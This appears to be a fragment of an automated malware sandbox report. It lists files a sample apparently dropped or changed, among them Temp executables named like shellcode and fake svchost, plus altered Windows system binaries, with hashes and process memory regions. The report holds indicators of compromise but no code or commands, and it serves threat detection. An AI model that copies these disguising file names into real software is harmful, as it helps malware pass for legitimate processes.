                                                                                                                    8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7522\python311.dll
                                                                                                                    Filesize

                                                                                                                    1.6MB

                                                                                                                    MD5

                                                                                                                    5792adeab1e4414e0129ce7a228eb8b8

                                                                                                                    SHA1

                                                                                                                    e9f022e687b6d88d20ee96d9509f82e916b9ee8c

                                                                                                                    SHA256

                                                                                                                    7e1370058177d78a415b7ed113cc15472974440d84267fc44cdc5729535e3967

                                                                                                                    SHA512

                                                                                                                    c8298b5780a2a5eebed070ac296eda6902b0cac9fda7bb70e21f482d6693d6d2631ca1ac4be96b75ac0dd50c9ca35be5d0aca9c4586ba7e58021edccd482958b

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7522\ucrtbase.dll
                                                                                                                    Filesize

                                                                                                                    992KB

                                                                                                                    MD5

                                                                                                                    0e0bac3d1dcc1833eae4e3e4cf83c4ef

                                                                                                                    SHA1

                                                                                                                    4189f4459c54e69c6d3155a82524bda7549a75a6

                                                                                                                    SHA256

                                                                                                                    8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

                                                                                                                    SHA512

                                                                                                                    a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\x4Mr.Joex.exe
                                                                                                                    Filesize

                                                                                                                    76KB

                                                                                                                    MD5

                                                                                                                    d299566894dfe7f85acfbf1033a6425b

                                                                                                                    SHA1

                                                                                                                    85533e1a427294aa3f9ab39fdf6d3ef855c4a3e2

                                                                                                                    SHA256

                                                                                                                    e62a5239c4599571d58fc59c7456024b8abf78b280bfcf5369658759ba9608b5

                                                                                                                    SHA512

                                                                                                                    0dbb85499b71767eac55935c51bc7de7ff332e3839b890e1a0da042f832508a74e625ed4ea83366d641c32183569bf48a35679286a295b53babf74a14098d2bf

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
                                                                                                                    Filesize

                                                                                                                    731KB

                                                                                                                    MD5

                                                                                                                    851be4e85b0f111883680e87099483a3

                                                                                                                    SHA1

                                                                                                                    155e19ad0d2ec4bef3ba25512b6e8bc403350ec9

                                                                                                                    SHA256

                                                                                                                    ba2d2058ab95d39a9c05c9c74dfa7c860cc662f33ecd96c35f2c344666472197

                                                                                                                    SHA512

                                                                                                                    bcfd99df20ba3e713801f9c41bc924379f4f6078703ec1d44e90ec3649aa1b2fce6ce802a71a0297516ccf344c627c91359434b7166d716dea69ab41c1fecce6

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\x4host.exe
                                                                                                                    Filesize

                                                                                                                    7.7MB

                                                                                                                    MD5

                                                                                                                    6744567c01e1c68851a13edc74f087ed

                                                                                                                    SHA1

                                                                                                                    a42f029b72974c069586e97fedf4fa8de965dd70

                                                                                                                    SHA256

                                                                                                                    d9cd70c2f17911e2c8b32ce6f0571f1567f195dd95ccc83ba48d1c2c8b0a5167

                                                                                                                    SHA512

                                                                                                                    d121c54a1308ff1c80091749e9b2cb2b7d3a82e3a25445df30eafcd84de54d091137277c7fc5194f551d506906090c8ea4a98a4a4865cc4fa353478f7ac7d4e7

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\x4svchost.exe
                                                                                                                    Filesize

                                                                                                                    47KB

                                                                                                                    MD5

                                                                                                                    8d8cd049bb5e46b1d041aa05b01e06bb

                                                                                                                    SHA1

                                                                                                                    5e5ed5a43c8ae871bd4e938e663eb39445e5c356

                                                                                                                    SHA256

                                                                                                                    01ebbee8144ef0da43c1bf4fd290c66d4573c56a9bdef94d888a1b94acf4c3ef

                                                                                                                    SHA512

                                                                                                                    ed7ee4d7a82d147fc6d7d053e0499625d585cb39701db94bbcab70f731243282d7ee24116e324ac6e0bf9df870d2315663537c3a7ed2c8b5f24f1a52392c1a96

                                                                                                                  • C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                                                                                                                    Filesize

                                                                                                                    659KB

                                                                                                                    MD5

                                                                                                                    95d257e26af5ee96e6ee8598f2c85edf

                                                                                                                    SHA1

                                                                                                                    e714357ba9957ef79fbcc6878f3a2c042dc666f9

                                                                                                                    SHA256

                                                                                                                    96c07ac8f7cc2d38aa8490ba24b1ff3fcde4fc9d005e5857dac391902214878f

                                                                                                                    SHA512

                                                                                                                    3c2d2b60d58822fcb195c8ee78902966dc25f1762bfd2a30d25f3b1b0fb1d9d9c3ebe4d0e5b3efb9c970b158e173c9663393df92d660b5c7267a811a70e3b596

                                                                                                                  • C:\Windows\System32\FXSSVC.exe
                                                                                                                    Filesize

                                                                                                                    1.2MB

                                                                                                                    MD5

                                                                                                                    b9395fd78b6a82f6faa10717e42e40c3

                                                                                                                    SHA1

                                                                                                                    8916d8675a0db49213a2a230ca893ab3679e45cc

                                                                                                                    SHA256

                                                                                                                    341ee8f9b21a63a6aea966f923e2c15c03b7e507091a3736fa3a34bb936ae6be

                                                                                                                    SHA512

                                                                                                                    d67e6cf0ecd097d4f75f4c4696cf6e2ecbd1b39ae40e06dcc22dd7b9b6a8724c5e6c0b5409aa87bdfdc88794ced1704edcdb3041d48989b80b90dac7654405b1

                                                                                                                  • C:\Windows\System32\alg.exe
                                                                                                                    Filesize

                                                                                                                    661KB

                                                                                                                    MD5

                                                                                                                    af7b57a0f87110f7f655cde201dfbfe5

                                                                                                                    SHA1

                                                                                                                    bd9bb3f44fd8c633a7af2c719c42b979f51bee5e

                                                                                                                    SHA256

                                                                                                                    25405c671241ee3f142a38ce499c26fc91d0978a87434dac74596ee375d08a3a

                                                                                                                    SHA512

                                                                                                                    f619ad2fb5b888688d9cfe8bca1e3a1e1cc7e006eac665832caab090c92d890917f8573687f6dc70a19d7c71241af02cc9693d2852077376fe1e752839d6aed8

                                                                                                                  • C:\Windows\Temp\__PSScriptPolicyTest_u0cm2kh4.kiu.ps1
                                                                                                                    Filesize

                                                                                                                    60B

                                                                                                                    MD5

                                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                    SHA1

                                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                    SHA256

                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                    SHA512

                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                  • C:\Windows\system32\AppVClient.exe
                                                                                                                    Filesize

                                                                                                                    1.3MB

                                                                                                                    MD5

                                                                                                                    6ad8183068b9142a7a8b5494fa808afa

                                                                                                                    SHA1

                                                                                                                    6eed34dc0848510be563bffa278386f5a73d18b9

                                                                                                                    SHA256

                                                                                                                    ce5dee62bcc2c66d2b4cf9fde8992be20a43f7e7d359c8715b3c94803ccd05b9

                                                                                                                    SHA512

                                                                                                                    29d958ace13c8eefcae81ff87930f4ec52c6883359b46ec91f1bd557efc0ccaf5f17df83e88c7f21d3b3a8b841a8e77fe5824c8e796a63e5894a104a1eed71e8

                                                                                                                  • memory/960-204-0x00000000007B0000-0x0000000000810000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    384KB

                                                                                                                  • memory/960-294-0x0000000140000000-0x00000001400CF000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    828KB

                                                                                                                  • memory/960-198-0x00000000007B0000-0x0000000000810000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    384KB

                                                                                                                  • memory/1400-193-0x0000000000D30000-0x0000000000D90000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    384KB

                                                                                                                  • memory/1400-208-0x0000000140000000-0x00000001400CF000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    828KB

                                                                                                                  • memory/1400-187-0x0000000000D30000-0x0000000000D90000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    384KB

                                                                                                                  • memory/1624-120-0x0000000000630000-0x0000000000697000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    412KB

                                                                                                                  • memory/1624-107-0x0000000000400000-0x00000000004B9000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    740KB

                                                                                                                  • memory/1624-156-0x0000000000400000-0x00000000004B9000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    740KB

                                                                                                                  • memory/1624-125-0x0000000000630000-0x0000000000697000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    412KB

                                                                                                                  • memory/1876-430-0x00000189E1AC0000-0x00000189E1AE2000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    136KB

                                                                                                                  • memory/3272-415-0x00007FF854F20000-0x00007FF85503C000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.1MB

                                                                                                                  • memory/3272-389-0x00007FF86B0E0000-0x00007FF86B103000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    140KB

                                                                                                                  • memory/3272-1327-0x00007FF855460000-0x00007FF855518000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    736KB

                                                                                                                  • memory/3272-1326-0x00007FF855040000-0x00007FF8553B8000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    3.5MB

                                                                                                                  • memory/3272-1325-0x00007FF86AFD0000-0x00007FF86AFFE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    184KB

                                                                                                                  • memory/3272-1324-0x00007FF86B000000-0x00007FF86B019000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    100KB

                                                                                                                  • memory/3272-1323-0x00007FF855520000-0x00007FF855697000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.5MB

                                                                                                                  • memory/3272-1222-0x00007FF86B0E0000-0x00007FF86B103000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    140KB

                                                                                                                  • memory/3272-1221-0x00007FF86F900000-0x00007FF86F923000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    140KB

                                                                                                                  • memory/3272-119-0x00007FF858130000-0x00007FF858719000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    5.9MB

                                                                                                                  • memory/3272-490-0x00007FF858130000-0x00007FF858719000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    5.9MB

                                                                                                                  • memory/3272-346-0x00007FF872510000-0x00007FF87251F000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    60KB

                                                                                                                  • memory/3272-407-0x00007FF86AFD0000-0x00007FF86AFFE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    184KB

                                                                                                                  • memory/3272-387-0x00007FF86B4E0000-0x00007FF86B50D000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    180KB

                                                                                                                  • memory/3272-409-0x00007FF855460000-0x00007FF855518000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    736KB

                                                                                                                  • memory/3272-411-0x00007FF86AFB0000-0x00007FF86AFC4000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    80KB

                                                                                                                  • memory/3272-345-0x00007FF86F900000-0x00007FF86F923000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    140KB

                                                                                                                  • memory/3272-412-0x00007FF86F8D0000-0x00007FF86F8DD000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    52KB

                                                                                                                  • memory/3272-408-0x00007FF855040000-0x00007FF8553B8000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    3.5MB

                                                                                                                  • memory/3272-391-0x00007FF86B000000-0x00007FF86B019000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    100KB

                                                                                                                  • memory/3272-392-0x00007FF86F8F0000-0x00007FF86F8FD000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    52KB

                                                                                                                  • memory/3272-388-0x00007FF86B110000-0x00007FF86B129000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    100KB

                                                                                                                  • memory/3272-390-0x00007FF855520000-0x00007FF855697000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.5MB

                                                                                                                  • memory/3348-86-0x0000000000E20000-0x0000000000E3A000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    104KB

                                                                                                                  • memory/4180-289-0x0000000140000000-0x00000001400AA000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    680KB

                                                                                                                  • memory/4180-136-0x0000000000520000-0x0000000000580000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    384KB

                                                                                                                  • memory/4180-130-0x0000000000520000-0x0000000000580000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    384KB

                                                                                                                  • memory/4472-410-0x00007FF85B420000-0x00007FF85BEE1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    10.8MB

                                                                                                                  • memory/4472-467-0x00007FF85B420000-0x00007FF85BEE1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    10.8MB

                                                                                                                  • memory/4472-14-0x0000000000670000-0x0000000000682000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    72KB

                                                                                                                  • memory/4472-25-0x00007FF85B420000-0x00007FF85BEE1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    10.8MB

                                                                                                                  • memory/4616-148-0x0000000000580000-0x00000000005E0000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    384KB

                                                                                                                  • memory/4616-290-0x0000000140000000-0x00000001400A9000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    676KB

                                                                                                                  • memory/4616-142-0x0000000000580000-0x00000000005E0000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    384KB

                                                                                                                  • memory/4772-1219-0x0000000140000000-0x000000014024B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    2.3MB

                                                                                                                  • memory/4772-165-0x0000000000C70000-0x0000000000CD0000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    384KB

                                                                                                                  • memory/4772-159-0x0000000000C70000-0x0000000000CD0000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    384KB

                                                                                                                  • memory/4772-291-0x0000000140000000-0x000000014024B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    2.3MB

                                                                                                                  • memory/4856-478-0x000001CB7A370000-0x000001CB7A39A000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    168KB

                                                                                                                  • memory/4964-183-0x00000000001A0000-0x0000000000200000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    384KB

                                                                                                                  • memory/4964-1220-0x0000000140000000-0x000000014022B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    2.2MB

                                                                                                                  • memory/4964-292-0x0000000140000000-0x000000014022B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    2.2MB

                                                                                                                  • memory/4964-177-0x00000000001A0000-0x0000000000200000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    384KB

                                                                                                                  • memory/5084-167-0x0000000000530000-0x0000000000590000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    384KB

                                                                                                                  • memory/5084-173-0x0000000000530000-0x0000000000590000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    384KB

                                                                                                                  • memory/5084-219-0x0000000140000000-0x0000000140135000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.2MB

                                                                                                                  • memory/5100-1-0x0000000000F10000-0x0000000001768000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    8.3MB

                                                                                                                  • memory/5100-12-0x00007FF85B420000-0x00007FF85BEE1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    10.8MB

                                                                                                                  • memory/5100-108-0x00007FF85B420000-0x00007FF85BEE1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    10.8MB

                                                                                                                  • memory/5100-0-0x00007FF85B423000-0x00007FF85B425000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    8KB